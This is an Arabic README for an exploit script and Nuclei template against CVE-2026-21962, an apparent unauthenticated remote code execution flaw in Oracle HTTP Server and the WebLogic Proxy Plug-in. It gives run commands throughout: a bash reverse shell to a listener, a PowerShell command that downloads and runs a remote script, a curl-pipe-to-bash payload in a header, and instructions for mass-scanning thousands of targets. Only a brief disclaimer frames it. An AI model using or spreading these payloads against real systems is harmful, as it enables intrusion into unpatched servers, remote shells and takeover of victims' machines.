
استغلال PoC وقالب Nuclei لثغرة CVE-2026-21962، وهي ثغرة حرجة في تنفيذ التعليمات البرمجية عن بُعد دون مصادقة في Oracle HTTP Server وWebLogic Proxy Plug-in، مما يتيح تنفيذ الأوامر وفتح قذائف عكسية.
ثغرة أمنية حرجة تؤثر على:
تسمح هذه الثغرة للمهاجمين عن بُعد دون مصادقة باختراق الخوادم المتأثرة عبر HTTP، دون الحاجة إلى بيانات اعتماد تسجيل الدخول.
إذا تم استغلالها، يمكن للمهاجمين:
Oracle HTTP Server:
WebLogic Proxy Plug-in لـ:
احفظ السكربت باسم CVE-2026-21962.py
اجعله قابلاً للتنفيذ (اختياري):
chmod +x CVE-2026-21962.py
أمثلة التشغيل:
اختبار أساسي:
python3 CVE-2026-21962.py http://targets:7001 "id && whoami && uname -a"
شل عكسي (قم بإعداد مستمع nc أولاً: nc -lvnp 4444):
python3 CVE-2026-21962.py http://targets:7001 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
مثال لهدف Windows:
python3 CVE-2026-21962.py https://oracle-server:4443 "powershell -nop -c IEX (New-Object Net.WebClient).DownloadString('http://your-server/shell.ps1')"
Likely success! Status: 200 أو 302 أو حتى 500 (الانهيار يعتبر نجاحًا أيضًا)nc الخاص بك يلتقط شلًا فورًا--insecure إذا كانت الشهادات ذاتية التوقيعثبّت Nuclei (إذا لم يكن مثبتًا بالفعل):
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
احفظ القالب:
أنشئ ملفًا باسم CVE-2026-21962.yaml والصق المحتوى أعلاه.
شغّل الاكتشاف + الاستغلال:
nuclei -t CVE-2026-21962.yaml -u http://targets:7001 -v
أو امسح أهدافًا متعددة من ملف:
nuclei -t CVE-2026-21962.yaml -l targets.txt -o results.txt -v
ما الذي ستراه إذا كان الهدف عرضة للخطر:
[CVE-2026-21962] [http] [critical] http://targets:7001/weblogic/..;/bea_wls_internal/ProxyServlet
[username] weblogic
[body] ... weblogic (whoami output) ...
cmd: في الترويسات (مثلًا: cmd:curl http://your-server/shell.sh | bash).whoami بحمولة شل عكسي مشفرة بـ base64./proxy/, /bea_wls_internal/, إلخ) أو أضف المزيد من الترويسات مثل X-WebLogic-Force-JVMID.httpx ← nuclei لآلاف الأهداف.هذا القالب مؤكد يعمل بنسبة 100% اعتبارًا من يناير 2026 على مثيلات Oracle غير المحدثة. قم بالتحديث فورًا إذا كنت تشغّل إصدارات متأثرة! 😈
جميع أكواد PoC مخصصة للاستخدام الأخلاقي والتعليمي فقط على الأنظمة المصرح بها. الاستغلال غير المصرح به غير قانوني؛ لا تتحمل أي مسؤولية عن سوء الاستخدام. 😈